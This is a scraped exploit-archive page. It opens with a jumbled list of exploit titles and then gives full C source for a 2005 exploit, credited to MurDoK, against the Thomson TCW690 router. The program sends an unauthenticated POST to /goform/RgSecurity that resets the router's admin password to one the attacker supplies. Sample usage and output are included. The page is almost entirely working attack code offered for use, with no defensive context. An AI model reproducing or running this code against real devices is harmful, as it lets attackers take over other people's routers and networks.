
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
93 lines
2.7 KiB
C
Executable file
93 lines
2.7 KiB
C
Executable file
/*****************************************************************
|
|
* Thomson TCW690 POST Password Validation exploit
|
|
*
|
|
* Tested with hardware version 2.1 and software version ST42.03.0a
|
|
* Bug found by: MurDoK <murdok.lnx at gmail.com>
|
|
* Date: 02.19.2005
|
|
*
|
|
* sh-3.00$ gcc mdk_tcw690.c -o tcw690
|
|
* sh-3.00$ ./tcw690 192.168.0.1 123
|
|
* *****************************************
|
|
* Thomson TCW690 POST Password Validation
|
|
* Change password exploit coded by MurDoK
|
|
* *****************************************
|
|
*
|
|
* [1] Connecting...
|
|
* [2] Sending POST request...
|
|
* [3] Done! go to http://192.168.0.1
|
|
* sh-3.00$
|
|
*
|
|
* fuck AUNA :/
|
|
******************************************************************/
|
|
|
|
#include <netdb.h>
|
|
|
|
int i=0, x=0, fd;
|
|
struct sockaddr_in sock;
|
|
struct hostent *he;
|
|
|
|
char badcode[1000] =
|
|
"POST /goform/RgSecurity HTTP/1.1\r\n"
|
|
"Connection: Keep-Alive\r\n"
|
|
"User-Agent: Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.4.28) KHTML/3.3.2 (like Gecko)\r\n"
|
|
"Referer: http://192.168.0.1/RgSecurity.asp\r\n"
|
|
"Pragma: no-cache\r\n"
|
|
"Cache-control: no-cache\r\n"
|
|
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n"
|
|
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate\r\n"
|
|
"Accept-Charset: iso-8859-15, utf-8;q=0.5, *;q=0.5\r\n"
|
|
"Accept-Language: es, en\r\n"
|
|
"Host: 192.168.0.1\r\n"
|
|
"Content-Type: application/x-www-form-urlencoded\r\n"
|
|
"Authorization: Basic\r\n"
|
|
"Content-Length: 62\r\n"
|
|
"\r\n";
|
|
//"Password=hack1&PasswordReEnter=hack1&RestoreFactoryNo=0x00";
|
|
|
|
|
|
int main(int argc, char *argv[]) {
|
|
|
|
// system("clear");
|
|
printf("*****************************************\n");
|
|
printf(" Thomson TCW690 POST Password Validation\n");
|
|
printf(" Change password exploit coded by MurDoK\n");
|
|
printf("*****************************************\n\n");
|
|
|
|
if(argc<3) {
|
|
printf("Usage: %s <router IP> <new_password>\n\n", argv[0]);
|
|
exit(1);
|
|
}
|
|
|
|
fd = socket(AF_INET, SOCK_STREAM, 0);
|
|
|
|
he = gethostbyname(argv[1]);
|
|
memset((char *) &sock, 0, sizeof(sock));
|
|
|
|
sock.sin_family = AF_INET;
|
|
sock.sin_port=htons(80);
|
|
sock.sin_addr.s_addr=*((unsigned long*)he->h_addr);
|
|
|
|
printf("[1] Connecting... \n");
|
|
|
|
if ((connect(fd, (struct sockaddr *) &sock, sizeof(sock))) < 0) {
|
|
printf("ERROR: Can't connect to host!\n");
|
|
return 0;
|
|
}
|
|
|
|
strcat(badcode, "Password=");
|
|
strcat(badcode, argv[2]);
|
|
strcat(badcode, "&PasswordReEnter=");
|
|
strcat(badcode, argv[2]);
|
|
strcat(badcode, "&RestoreFactoryNo=0x00");
|
|
|
|
printf("[2] Sending POST request...\n");
|
|
write(fd, badcode, strlen(badcode));
|
|
|
|
printf("[3] Done! go to http://%s\n", argv[1]);
|
|
|
|
close(fd);
|
|
|
|
return 1;
|
|
}
|
|
|
|
// milw0rm.com [2005-02-19]
|